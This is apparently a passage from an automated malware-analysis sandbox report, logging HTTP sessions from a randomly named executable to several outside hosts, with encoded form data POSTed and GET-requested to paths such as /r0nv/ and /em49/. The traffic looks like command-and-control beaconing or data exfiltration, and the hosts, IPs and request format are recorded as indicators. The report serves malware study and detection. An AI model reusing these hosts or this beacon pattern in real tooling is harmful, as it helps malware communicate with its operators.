                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 77 6c 69 61 35 72 72 71 6f 77 6e 39 47 6d 39 38 4d 61 32 79 50 66 67 34 6e 73 46 46 31 52 41 4f 6a 4e 5a 5a 6b 4a 79 75 66 37 68 41 67 55 32 32 69 51 70 73 71 4a 2f 48 4d 53 6a 6e 56 70 76 74 79 6a 34 2f 5a 38 72 38 74 42 43 6b 4a 50 6d 51 72 71 4f 73 58 77 6f 55 4f 76 79 5a 49 31 32 78 74 7a 31 59 45 51 6d 37 68 44 6d 67 4a 53 69 79 4d 61 33 48 48 6e 41 4c 44 39 6d 58 4b 33 67 38 76 76 56 51 47 53 4d 59 63 74 56 54 37 6a 65 4b 36 63 43 6b 6f 45 62 50 53 4a 47 39 5a 50 6e 57 6c 5a 47 71 36 52 49 56 39 6c 65 4e 70 4e 30 71 32 63 65 4b 49 54 77 78 71 49 6c 6c 6e 53 53 70 4b 36 50 4a 72 69 68 49 44 57 73 76 6c 68 6e 42 33 6b 6d 4e 30 6b 47 55 4f 4a 68 62 4b 4b 53 5a 66 41 7a 43 5a 49 4c 74 66 37 70 76 65 35 48 75 52 30 6c 6b 65 50 6a 31 57 73 32 58 73 74 33 31 57 50 55 75 32 35 4f 6d 74 38 32 6a 51 31 6f 56 4c 74 2b 33 53 66 43 59 47 4c 5a 71 4e 78 5a 6a 67 6b 5a 38 48 77 66 70 49 2f 6d 63 6e 43 7a 69 76 4b 78 68 44 53 77 6b 63 67 67 6a 73 74 31 72 74 68 39 6c 46 4f 49 41 45 [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=wlia5rrqown9Gm98Ma2yPfg4nsFF1RAOjNZZkJyuf7hAgU22iQpsqJ/HMSjnVpvtyj4/Z8r8tBCkJPmQrqOsXwoUOvyZI12xtz1YEQm7hDmgJSiyMa3HHnALD9mXK3g8vvVQGSMYctVT7jeK6cCkoEbPSJG9ZPnWlZGq6RIV9leNpN0q2ceKITwxqIllnSSpK6PJrihIDWsvlhnB3kmN0kGUOJhbKKSZfAzCZILtf7pve5HuR0lkePj1Ws2Xst31WPUu25Omt82jQ1oVLt+3SfCYGLZqNxZjgkZ8HwfpI/mcnCzivKxhDSwkcggjst1rth9lFOIAEiZ2NdcEIH6bFRZc/hX867Nl9JuA4JRM3GDw7rEXjJ89ahGPAD1DR2DPwVmh8H4omgglhsbazCzi06QycGnHFJjkih//U5NRRRpaE2qUpmXbKMuuqxa9YX9ebpfYWy4xjNSUz4wnom0twHpFCgDVIo75QLx9bDz8txmlzo+X/AVG0aLjXO1+hZc38UMwgC31Ebrr1EoaXS51ujWb6zZ5Woy0dJoIGk5JM5XjRhuSTdj5J4HWDhMFa2SGGYDgw6COuem9mq3nWpzU5dYc9q+zAdmgtX+6ZhbWUc3kdVCvrD3/H7GODY7+Rkk5CjnytlBdd/fkrapnFZpK4Ck/6CXL/vySUikC7t9s9NQ1KfBw/fWz+MS5CwICqauyVUQoPOH8JmVqOcbN1SOt96B6t4tjllxOQUMHFZZ178MHOuxf+MAu2xpog6hz+oQA1lCfcbVSJZghxbfg4dtw/DzfB4WmwKOL4ha7ld9NMawfZFGbmQSd8bOVb+ULOF9YgNae5ydIRv6V0Bmn3yOmXkLEbS8/7KZpOTWVgHPuxtf4L4aK3J/5c0fQBkP0utftmonR03qNG4c6LSsbDYDixwjSgmQPmVRYLoixM2av3i0vZEIfA7qVFq2ie2SHygMxoAqQtoBGkxNKbeOxzM9/b2j6mk+CnK+JT7gVOXq4KdA [TRUNCATED]
                                                    Sep 11, 2024 15:44:49.785161972 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.849728154.23.184.60803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:51.204773903 CEST355OUTGET /sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:52.152250051 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.849729162.0.238.43803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:57.231609106 CEST604OUTPOST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 42 5a 5a 4d 49 41 54 6f 4f 47 6b 7a 7a 58 4a 6b 47 51 69 68 35 76 54 6d 4c 7a 46 42 73 55 44 43 4d 76 4e 77 5a 52 4c 46 38 47 54 79 79 4e 4e 36 48 42 6c 47 50 73 2b 66 4b 61 58 47 31 63 70 51 4c 52 39 6c 48 76 49 4a 46 30 6d 57 7a 6e 6e 37 6b 6b 49 6d 41 4e 54 49 58 77 30 59 4b 72 74 64 74 4a 57 4f 4d 46 7a 30 42 61 31 6b 34 7a 62 62 48 48 76 6f 76 68 2f 6a 70 67 54 4a 77 33 2f 5a 33 44 51 71 41 31 51 64 5a 78 68 73 53 42 73 57 69 72 31 2b 4e 4c 62 54 41 57 49 61 4e 2b 67 49 73 4a 75 44 51 70 33 51 70 6c 78 58 30 2f 76 44 48 4f 38 65 7a 39 4c 56 53 6c 73 42 59 2f 36 45 63 4d 62 4a 6b 66 6f 3d
                                                    Data Ascii: 7FhphPx8=BZZMIAToOGkzzXJkGQih5vTmLzFBsUDCMvNwZRLF8GTyyNN6HBlGPs+fKaXG1cpQLR9lHvIJF0mWznn7kkImANTIXw0YKrtdtJWOMFz0Ba1k4zbbHHvovh/jpgTJw3/Z3DQqA1QdZxhsSBsWir1+NLbTAWIaN+gIsJuDQp3QplxX0/vDHO8ez9LVSlsBY/6EcMbJkfo=
                                                    Sep 11, 2024 15:44:57.824476957 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:44:57 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.849730162.0.238.43803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:59.775018930 CEST624OUTPOST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 42 5a 5a 4d 49 41 54 6f 4f 47 6b 7a 79 30 52 6b 45 7a 4b 68 2b 50 54 68 4f 7a 46 42 32 6b 44 47 4d 75 78 77 5a 54 6d 61 38 30 48 79 78 76 56 36 47 44 64 47 49 73 2b 66 42 36 57 4d 37 38 70 58 4c 52 78 62 48 75 6b 4a 46 77 4f 57 7a 69 44 37 6b 54 63 6c 53 74 54 4f 4f 67 30 61 58 37 74 64 74 4a 57 4f 4d 46 6e 61 42 61 39 6b 35 43 72 62 47 6d 76 33 77 52 2f 38 75 67 54 4a 30 33 2b 65 33 44 52 50 41 30 4d 6e 5a 79 5a 73 53 46 67 57 6c 2f 42 2f 47 4c 61 61 4f 32 4a 2b 45 64 59 46 69 59 6e 6a 65 37 48 4f 6a 55 46 71 31 4a 43 70 64 73 30 59 77 39 6a 2b 53 6d 45 33 64 49 6e 73 47 76 4c 35 36 49 2f 43 49 75 69 30 73 75 35 38 46 33 56 32 50 48 66 4c 63 4f 2f 48
                                                    Data Ascii: 7FhphPx8=BZZMIAToOGkzy0RkEzKh+PThOzFB2kDGMuxwZTma80HyxvV6GDdGIs+fB6WM78pXLRxbHukJFwOWziD7kTclStTOOg0aX7tdtJWOMFnaBa9k5CrbGmv3wR/8ugTJ03+e3DRPA0MnZyZsSFgWl/B/GLaaO2J+EdYFiYnje7HOjUFq1JCpds0Yw9j+SmE3dInsGvL56I/CIui0su58F3V2PHfLcO/H
                                                    Sep 11, 2024 15:45:00.400854111 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:00 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.849731162.0.238.43803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:02.320782900 CEST1641OUTPOST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 42 5a 5a 4d 49 41 54 6f 4f 47 6b 7a 79 30 52 6b 45 7a 4b 68 2b 50 54 68 4f 7a 46 42 32 6b 44 47 4d 75 78 77 5a 54 6d 61 38 31 2f 79 79 65 31 36 47 6b 78 47 4a 73 2b 66 43 36 57 50 37 38 6f 4c 4c 52 70 58 48 75 5a 79 46 32 4b 57 31 42 37 37 69 68 6b 6c 59 74 54 4f 42 41 30 66 4b 72 74 49 74 4a 47 4b 4d 46 33 61 42 61 39 6b 35 41 7a 62 47 33 76 33 79 52 2f 6a 70 67 54 64 77 33 2f 35 33 44 49 79 41 30 34 33 5a 43 35 73 54 6c 77 57 67 4d 70 2f 46 72 61 55 44 57 4a 6d 45 63 6c 46 69 59 71 53 65 37 66 6f 6a 54 78 71 31 74 7a 79 49 74 5a 50 73 64 37 35 58 6e 59 76 45 50 50 64 48 50 62 39 31 50 72 36 47 4f 79 4f 67 4f 68 76 4a 58 63 53 54 51 44 62 57 2b 50 49 67 2f 6c 73 5a 57 62 45 73 39 2f 70 58 50 4d 4b 46 38 77 6a 44 30 44 56 38 76 6a 65 32 4b 4e 46 6a 59 6f 42 78 47 65 2b 74 37 4a 45 75 45 34 47 7a 66 6a 61 6e 47 45 57 43 38 39 61 57 74 52 52 55 2f 43 68 54 52 50 56 59 73 66 67 4f 49 5a 52 39 2b 35 53 78 75 4d 38 56 38 50 4e 61 54 41 44 44 74 58 71 69 75 69 54 30 59 4c 4d 77 [TRUNCATED]
                                                    Data Ascii: 7FhphPx8=BZZMIAToOGkzy0RkEzKh+PThOzFB2kDGMuxwZTma81/yye16GkxGJs+fC6WP78oLLRpXHuZyF2KW1B77ihklYtTOBA0fKrtItJGKMF3aBa9k5AzbG3v3yR/jpgTdw3/53DIyA043ZC5sTlwWgMp/FraUDWJmEclFiYqSe7fojTxq1tzyItZPsd75XnYvEPPdHPb91Pr6GOyOgOhvJXcSTQDbW+PIg/lsZWbEs9/pXPMKF8wjD0DV8vje2KNFjYoBxGe+t7JEuE4GzfjanGEWC89aWtRRU/ChTRPVYsfgOIZR9+5SxuM8V8PNaTADDtXqiuiT0YLMwkXGZ8dXbyOY4QRXw4aosr9ERQ1807TyqWUDlNnsaox/NabGhkxkkwEvldc4wftdRuZCsamzPr/Cf31mfdcxxISELS0dxJ4cb9KEsHq6gu/nviIIN7jTF8Ren+JLdG+vz2Rf+wLPatdQaqY2/emgWtQqr1fvli9v+TXPwwlXqHfrzm4LZXIKQqeFeWWoa2N3RFYwRWrGLqXaFPrrBcG+82asnHf/rrsf7+K1yoNGNjkvqO1/X2hwSXInUo+PG5FD+RZ/wgnJl+XWpFEifkR9TWHeys+945ErGGEftKfnC5HPsUTWA2KlIu9wCQAl5O5LS/+SVsTlZQTtz60NiYdT9lpTyHQxiZ7lXZFaDeWdBpkNsCoCDoRIjlQKbA7hs1QiSzQSOJ47gUwgCh8IvgxIMqGT0bgW6qQl5LjKVtjpJl5x7qa5avuzMlFfzlpfmAJRZpIgdakXzDbTTdyNvABP/nTG5uFymyBbIrlFfWwbEN0y1rbTJhCtQlGfJHDkMm0TNzHQT3b3kpf4WOqppyHuWSrgCydBNUpLsma29haPYDxCLgL2+ILB0zAVD2KWiXCWOcZPaCnZZwNvjfYAF7aBetF3U93WfhSyRUeF0+GwZKjeyCujzrpZ595VwkwIONWnH+pDh9QClOKF1sCQgLMwoPK4qXF95HmPZ8M [TRUNCATED]
                                                    Sep 11, 2024 15:45:02.993464947 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:02 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.849732162.0.238.43803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:04.881326914 CEST356OUTGET /r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:05.507752895 CEST548INHTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:05 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.849733136.143.186.12803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:45:10.875428915 CEST613OUTPOST /em49/ HTTP/1.1
                                                    Host: www.lanxuanz.tech
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.lanxuanz.tech
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.lanxuanz.tech/em49/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 69 58 52 78 66 6a 63 36 61 69 46 53 77 65 46 38 5a 66 4f 74 4b 72 56 78 65 53 47 43 35 44 67 54 45 49 68 58 67 4f 7a 4f 50 63 66 53 65 6f 6d 36 4e 32 47 4a 48 56 68 7a 6a 56 41 67 64 69 4c 42 41 4f 4b 78 55 4c 79 72 79 46 4b 5a 6a 38 32 41 49 79 35 73 33 38 57 6f 74 7a 2f 55 6b 56 79 39 34 4d 78 4a 74 6f 62 38 71 6b 77 57 39 57 70 6a 51 39 35 39 51 42 4b 73 2b 6c 50 6f 32 4f 69 66 6f 71 38 50 6a 49 38 47 35 55 59 4f 67 34 44 69 35 33 35 38 7a 76 62 36 69 56 52 65 6d 61 64 35 55 68 69 6a 67 52 2f 53 66 52 56 46 48 72 4a 6c 51 57 53 44 31 45 6e 65 33 51 4a 43 6e 48 72 77 74 48 44 47 74 49 4d 3d
                                                    Data Ascii: 7FhphPx8=iXRxfjc6aiFSweF8ZfOtKrVxeSGC5DgTEIhXgOzOPcfSeom6N2GJHVhzjVAgdiLBAOKxULyryFKZj82AIy5s38Wotz/UkVy94MxJtob8qkwW9WpjQ959QBKs+lPo2Oifoq8PjI8G5UYOg4Di5358zvb6iVRemad5UhijgR/SfRVFHrJlQWSD1Ene3QJCnHrwtHDGtIM=
                                                    Sep 11, 2024 15:45:11.474853039 CEST1236INHTTP/1.1 404
                                                    Server: ZGS
                                                    Date: Wed, 11 Sep 2024 13:45:11 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                    Set-Cookie: csrfc=70032b4f-d818-4062-a01e-c73120e2f738;path=/;priority=high
                                                    Set-Cookie: _zcsr_tmp=70032b4f-d818-4062-a01e-c73120e2f738;path=/;SameSite=Strict;priority=high
                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                    vary: accept-encoding
                                                    Content-Encoding: gzip
